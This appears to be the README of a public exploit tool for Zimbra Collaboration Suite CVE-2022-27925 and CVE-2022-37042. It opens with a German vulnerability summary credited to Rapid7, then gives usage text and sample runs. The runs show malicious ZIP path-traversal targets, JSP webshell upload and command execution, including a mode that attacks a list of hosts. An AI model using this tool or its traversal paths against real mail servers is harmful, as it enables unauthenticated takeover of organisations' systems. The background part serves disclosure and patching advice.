
PoC
Am 10. Mai 2022 veröffentlichte Zimbra die Versionen 9.0.0 Patch 24 und 8.8.15 Patch 31, um mehrere Sicherheitslücken in der Zimbra Collaboration Suite zu beheben, darunter CVE-2022-27924 (über das wir bereits geschrieben haben) und CVE-2022-27925.
Ursprünglich bezeichnete Zimbra CVE-2022-27925 als einen authentifizierten Path-Traversal-Angriff, bei dem ein Administrator-Benutzer Dateien als Zimbra-Benutzer in beliebige Verzeichnisse des Dateisystems schreiben konnte. Da es ursprünglich als ein nur für Administratoren durchführbarer Angriff galt, bewertete NVD ihn mit einem CVSS-Basis-Score von 7,8. Später stellte Volexity fest, dass Angreifer, die diese Schwachstelle ausnutzten, einen Weg gefunden hatten, die Administrator-Anforderungen zu umgehen, und berichtete am 10. August 2022 darüber. Diese neue Authentifizierungsumgehung erhielt eine eigene Kennung – CVE-2022-37042.
Durch die Kombination der ursprünglichen Path-Traversal-Schwachstelle und der neuen Authentifizierungsumgehung können Angreifer ein Zimbra Collaboration Suite-System über den Administrator-Port (standardmäßig 7071) anonym aus der Ferne kompromittieren. In Kombination mit einer derzeit ungepatchten Privilegienausweitung-Schwachstelle, über die wir kürzlich geschrieben und einen Exploit veröffentlicht haben, führen diese drei Schwachstellen auf ungepatchten Systemen zur Remote-Codeausführung als Root-Benutzer.
Obwohl die öffentlichen Hinweise dies nicht erwähnen, ist nach unserer Analyse die Zimbra Collaboration Suite Network Edition (die kostenpflichtige Edition) anfällig, die Open Source Edition (kostenlos) jedoch nicht (da sie den anfälligen mboximport-Endpunkt nicht besitzt). Anfällige Versionen sind:
Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (und früher)
Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (und früher)
Diese Schwachstellen (und weitere in Zimbra) werden derzeit für weitreichende Angriffe in freier Wildbahn ausgenutzt und sollten daher so schnell wie möglich gepatcht oder offline genommen werden. Wenn Sie vermuten, kompromittiert worden zu sein, stellt Zimbra Schritte zur Verfügung, um Ihren Zimbra Collaboration Suite-Server mit dem neuesten Patch von Grund auf neu aufzubauen, ohne Daten zu verlieren.
Quelle: https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis
_____ _ __
/__ / (_)___ ___ / /_ _________ _
/ / / / __ `__ \/ __ \/ ___/ __ `/
/ /__/ / / / / / / /_/ / / / /_/ /
/____/_/_/ /_/ /_/_.___/_/ \__,_/
CVE-2022-27925
usage: exploit.py [-h] [-t TARGET] [-l LIST]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
URl with protocol HTTPS
-l LIST, --list LIST List of targets
root@root# python exploit.py -t zimbra.example.com
_____ _ __
/__ / (_)___ ___ / /_ _________ _
/ / / / __ `__ \/ __ \/ ___/ __ `/
/ /__/ / / / / / / /_/ / / / /_/ /
/____/_/_/ /_/ /_/_.___/_/ \__,_/
CVE-2022-27925 Sanan Qasim
[!] Testing URL: https://zimbra.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/BQOQBN.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
root@root# python exploit.py -l targets.txt
_____ _ __
/__ / (_)___ ___ / /_ _________ _
/ / / / __ `__ \/ __ \/ ___/ __ `/
/ /__/ / / / / / / /_/ / / / /_/ /
/____/_/_/ /_/ /_/_.___/_/ \__,_/
CVE-2022-27925 sanan Qasim
[!] Testing URL: https://patched.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Testing URL: https://zimbra.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Testing URL: https://patched.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable